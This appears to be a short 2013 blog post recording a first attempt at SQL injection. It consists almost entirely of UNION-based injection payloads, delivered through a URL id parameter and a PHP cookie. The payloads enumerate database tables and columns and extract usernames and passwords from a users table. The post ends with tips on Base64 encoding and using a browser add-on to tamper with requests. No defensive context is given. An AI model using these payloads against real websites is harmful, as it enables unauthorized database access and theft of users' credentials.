Posts

Showing posts from March, 2013

SQL injection My First Try

Image
id=4  UNION ALL SELECT 1,2,3 id=4  UNION ALL SELECT 1,table_name,3 from information_schema.tables id=4  UNION ALL SELECT 1,column_name,3 from information_schema.columns id=4  UNION ALL SELECT 1,username,password from users Another is by COOKIES in PHP <query> = '$username' ' UNION ALL SELECT 1,2;# ' UNION ALL SELECT table_name,3 from information_schema.tables;# ' UNION ALL SELECT column_name,1 from information_schema.columns;# ' UNION ALL SELECT login, password from users;# i BASE64 convertor http://www.base64decode.org/ TAMPER DATA in MOZILA browser to inject it